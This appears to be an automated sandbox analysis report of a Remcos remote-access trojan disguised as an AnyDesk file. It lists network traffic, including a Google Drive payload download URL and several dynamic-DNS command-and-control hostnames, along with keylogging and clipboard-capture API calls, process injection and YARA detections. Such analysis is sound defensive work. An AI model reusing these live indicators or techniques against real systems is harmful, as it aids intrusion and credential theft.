                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,19_2_0041B411
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                  Source: global trafficHTTP traffic detected: GET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: freshmeetre1ms.freeddns.org
                  Source: global trafficDNS traffic detected: DNS query: freshmysweeterbk.ddns.net
                  Source: global trafficDNS traffic detected: DNS query: mysweeterbk.ddns.net
                  Source: global trafficDNS traffic detected: DNS query: bbhmeetre1ms.freeddns.org
                  Source: global trafficDNS traffic detected: DNS query: myumysmeetr.ddns.net
                  Source: global trafficDNS traffic detected: DNS query: meetre1ms.freeddns.org
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                  Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: colorcpl.exe, 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.1903384135.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000290C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000290F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1967008119.0000000002AD2000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001F.00000002.2050844522.0000000002B42000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                  Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                  Source: AnyDesk.PIF, 00000009.00000002.1845207168.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                  Source: AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.00000000209F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv
                  Source: AnyDesk.PIF, 00000009.00000003.1823239665.0000000000675000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                  Source: AnyDesk.PIF, 00000009.00000002.1845207168.000000000065D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download
                  Source: AnyDesk.PIF, 00000009.00000002.1845207168.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=downloadj
                  Source: AnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=downlo
                  Source: AnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontn
                  Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                  Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                  Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                  Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                  Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                  Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49732 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000019_2_0040A2F3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,19_2_0040B749
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_004168FC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F57633 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_06F57633
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,19_2_0040B749
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,19_2_0040A41B
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 3288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,6_2_00007FF6A2A1B684

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041CA6D SystemParametersInfoW,19_2_0041CA6D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041CA73 SystemParametersInfoW,19_2_0041CA73
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5D7A4 SystemParametersInfoW,19_2_06F5D7A4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5D7AA SystemParametersInfoW,19_2_06F5D7AA
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6A2A5E1F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A9A740
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A225E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF6A2A225E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A229A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6A2A229A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF6A2A4EA7C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A50F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF6A2A50F58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF6A2A60EF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96EA8 NCryptImportKey,#360,6_2_00007FF6A2A96EA8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A6342C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A993A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A993A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6A2A5184C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A998B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6A2A998B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6A29FFC20
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6A29EF9B8

                  System Summary

                  barindex
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
